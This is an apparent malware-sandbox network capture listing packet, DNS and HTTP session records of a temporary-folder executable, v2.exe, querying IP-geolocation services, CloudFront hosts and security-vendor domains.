                                                                                                                                                                                                                                    Dec 28, 2024 22:21:59.517945051 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:59.519707918 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:59.519721031 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.134315014 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.134397984 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.173023939 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.173039913 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.173656940 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.179471016 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.179506063 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:01.179510117 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:02.011100054 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:02.011260033 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:02.011338949 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:02.011338949 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:02.011359930 CET49951443192.168.2.53.165.135.3
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:02.011373043 CET443499513.165.135.3192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:14.892891884 CET4999480192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:15.012350082 CET8049994208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:15.012439013 CET4999480192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:15.013387918 CET4999480192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:15.132826090 CET8049994208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.156825066 CET8049994208.95.112.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.361668110 CET4999480192.168.2.5208.95.112.1
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.053884029 CET6514553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.292402983 CET53651451.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.150749922 CET5631353192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.291902065 CET53563131.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:07.448301077 CET6119253192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.079087019 CET53611921.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.165087938 CET5506553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.303551912 CET53550651.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.447704077 CET5550453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.753463030 CET53555041.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.291006088 CET5649653192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.500791073 CET53564961.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.032388926 CET6219853192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.320075989 CET53621981.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.580051899 CET4931053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.819847107 CET53493101.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.184484959 CET5345153192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.561644077 CET53534511.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:14.735938072 CET6039253192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:14.873739958 CET53603921.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.379668951 CET5296953192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.822206974 CET53529691.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:23.751873970 CET5215853192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:23.891159058 CET53521581.1.1.1192.168.2.5
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.053884029 CET192.168.2.51.1.1.10xe300Standard query (0)freegeoip.appA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.150749922 CET192.168.2.51.1.1.10x9a1eStandard query (0)ipbase.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:07.448301077 CET192.168.2.51.1.1.10x8100Standard query (0)d34hwk9wxgk5fi.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.165087938 CET192.168.2.51.1.1.10xf9c5Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.447704077 CET192.168.2.51.1.1.10xa482Standard query (0)d31tu1fsc224h4.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.291006088 CET192.168.2.51.1.1.10x94f6Standard query (0)d34hwk9wxgk5fi.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.032388926 CET192.168.2.51.1.1.10x4f5Standard query (0)shield.reasonsecurity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.580051899 CET192.168.2.51.1.1.10x77f5Standard query (0)d31tu1fsc224h4.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.184484959 CET192.168.2.51.1.1.10x777cStandard query (0)electron-shell.reasonsecurity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:14.735938072 CET192.168.2.51.1.1.10x7394Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.379668951 CET192.168.2.51.1.1.10x50a9Standard query (0)api.openweathermap.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:23.751873970 CET192.168.2.51.1.1.10x410aStandard query (0)cheatengine.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.292402983 CET1.1.1.1192.168.2.50xe300No error (0)freegeoip.app172.67.160.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:03.292402983 CET1.1.1.1192.168.2.50xe300No error (0)freegeoip.app104.21.73.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.291902065 CET1.1.1.1192.168.2.50x9a1eNo error (0)ipbase.com104.21.85.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:05.291902065 CET1.1.1.1192.168.2.50x9a1eNo error (0)ipbase.com172.67.209.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.079087019 CET1.1.1.1192.168.2.50x8100No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.079087019 CET1.1.1.1192.168.2.50x8100No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.079087019 CET1.1.1.1192.168.2.50x8100No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:08.079087019 CET1.1.1.1192.168.2.50x8100No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.303551912 CET1.1.1.1192.168.2.50xf9c5No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.753463030 CET1.1.1.1192.168.2.50xa482No error (0)d31tu1fsc224h4.cloudfront.net13.226.4.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.753463030 CET1.1.1.1192.168.2.50xa482No error (0)d31tu1fsc224h4.cloudfront.net13.226.4.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.753463030 CET1.1.1.1192.168.2.50xa482No error (0)d31tu1fsc224h4.cloudfront.net13.226.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.753463030 CET1.1.1.1192.168.2.50xa482No error (0)d31tu1fsc224h4.cloudfront.net13.226.4.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:15.171505928 CET1.1.1.1192.168.2.50x5f3No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:15.171505928 CET1.1.1.1192.168.2.50x5f3No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.500791073 CET1.1.1.1192.168.2.50x94f6No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.500791073 CET1.1.1.1192.168.2.50x94f6No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.500791073 CET1.1.1.1192.168.2.50x94f6No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:12.500791073 CET1.1.1.1192.168.2.50x94f6No error (0)d34hwk9wxgk5fi.cloudfront.net65.9.108.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.320075989 CET1.1.1.1192.168.2.50x4f5No error (0)shield.reasonsecurity.comd14mh4uvqj4iiz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.320075989 CET1.1.1.1192.168.2.50x4f5No error (0)d14mh4uvqj4iiz.cloudfront.net18.66.161.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.320075989 CET1.1.1.1192.168.2.50x4f5No error (0)d14mh4uvqj4iiz.cloudfront.net18.66.161.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.320075989 CET1.1.1.1192.168.2.50x4f5No error (0)d14mh4uvqj4iiz.cloudfront.net18.66.161.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:29.320075989 CET1.1.1.1192.168.2.50x4f5No error (0)d14mh4uvqj4iiz.cloudfront.net18.66.161.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.819847107 CET1.1.1.1192.168.2.50x77f5No error (0)d31tu1fsc224h4.cloudfront.net3.165.135.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.819847107 CET1.1.1.1192.168.2.50x77f5No error (0)d31tu1fsc224h4.cloudfront.net3.165.135.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.819847107 CET1.1.1.1192.168.2.50x77f5No error (0)d31tu1fsc224h4.cloudfront.net3.165.135.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:37.819847107 CET1.1.1.1192.168.2.50x77f5No error (0)d31tu1fsc224h4.cloudfront.net3.165.135.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.561644077 CET1.1.1.1192.168.2.50x777cNo error (0)electron-shell.reasonsecurity.comd2axwe94icddzf.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.561644077 CET1.1.1.1192.168.2.50x777cNo error (0)d2axwe94icddzf.cloudfront.net18.66.161.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.561644077 CET1.1.1.1192.168.2.50x777cNo error (0)d2axwe94icddzf.cloudfront.net18.66.161.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.561644077 CET1.1.1.1192.168.2.50x777cNo error (0)d2axwe94icddzf.cloudfront.net18.66.161.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:06.561644077 CET1.1.1.1192.168.2.50x777cNo error (0)d2axwe94icddzf.cloudfront.net18.66.161.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:14.873739958 CET1.1.1.1192.168.2.50x7394No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.822206974 CET1.1.1.1192.168.2.50x50a9No error (0)api.openweathermap.orgeu-api.openweathermap.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.822206974 CET1.1.1.1192.168.2.50x50a9No error (0)eu-api.openweathermap.org57.129.2.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:23.891159058 CET1.1.1.1192.168.2.50x410aNo error (0)cheatengine.org104.20.94.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:23.891159058 CET1.1.1.1192.168.2.50x410aNo error (0)cheatengine.org104.20.95.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:23.891159058 CET1.1.1.1192.168.2.50x410aNo error (0)cheatengine.org172.67.35.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    • freegeoip.app
                                                                                                                                                                                                                                    • ipbase.com
                                                                                                                                                                                                                                    • d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    • d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    • shield.reasonsecurity.com
                                                                                                                                                                                                                                    • ip-api.com
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.549707208.95.112.1805316C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:09.442434072 CET78OUTGET /json/?fields=61439 HTTP/1.1
                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:10.648534060 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:09 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.549709208.95.112.1805316C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:11.507074118 CET78OUTGET /json/?fields=61439 HTTP/1.1
                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Dec 28, 2024 22:20:12.742219925 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:11 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Ttl: 57
                                                                                                                                                                                                                                    X-Rl: 43
                                                                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                    2192.168.2.549994208.95.112.180
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:15.013387918 CET272OUTGET /json/ HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Dec 28, 2024 22:22:16.156825066 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:22:15 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 306
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.549704172.67.160.844435316C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:04 UTC67OUTGET /xml/ HTTP/1.1
                                                                                                                                                                                                                                    Host: freegeoip.app
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2024-12-28 21:20:05 UTC850INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:04 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                    Expires: Sat, 28 Dec 2024 22:20:04 GMT
                                                                                                                                                                                                                                    Location: https://ipbase.com/xml/
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZRmIr2zS6G9L6uXZ9z9rPmMBDr70pxEa55xn599YNEkgRIYJGQmqogEp%2BMCCAuNZwkkc%2FWbCkBja5H40QhR7B8DP4uMg8bt5eKkr2vd0nQ6TzykBWpMIeF9ktQXFgC2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f94979efdf842ec-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1724&rtt_var=809&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=681&delivery_rate=1693735&cwnd=183&unsent_bytes=0&cid=1d08db9746382969&ts=454&x=0"
                                                                                                                                                                                                                                    2024-12-28 21:20:05 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.549705104.21.85.1894435316C:\Users\user\AppData\Local\Temp\v2.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC64OUTGET /xml/ HTTP/1.1
                                                                                                                                                                                                                                    Host: ipbase.com
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC957INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:06 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Age: 110082
                                                                                                                                                                                                                                    Cache-Control: public,max-age=0,must-revalidate
                                                                                                                                                                                                                                    Cache-Status: "Netlify Edge"; hit
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    X-Nf-Request-Id: 01JG7J81N4E6X2E12RP7G7B6GS
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7r0NPIuGsZ62nCmG%2B9T6%2BEJa%2Bvziov%2BnTwYxkAtEToRUQ4abL8%2BF8KwkL4G5621G0oN5enLCnKWm6e37Jg9og3KBJlnmk%2Fv6dSR5evPgEtTsJCxYDl%2BNNqdsbPm4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8f9497aa783b334e-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1818&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=678&delivery_rate=1553191&cwnd=173&unsent_bytes=0&cid=7087dacb525097ba&ts=478&x=0"
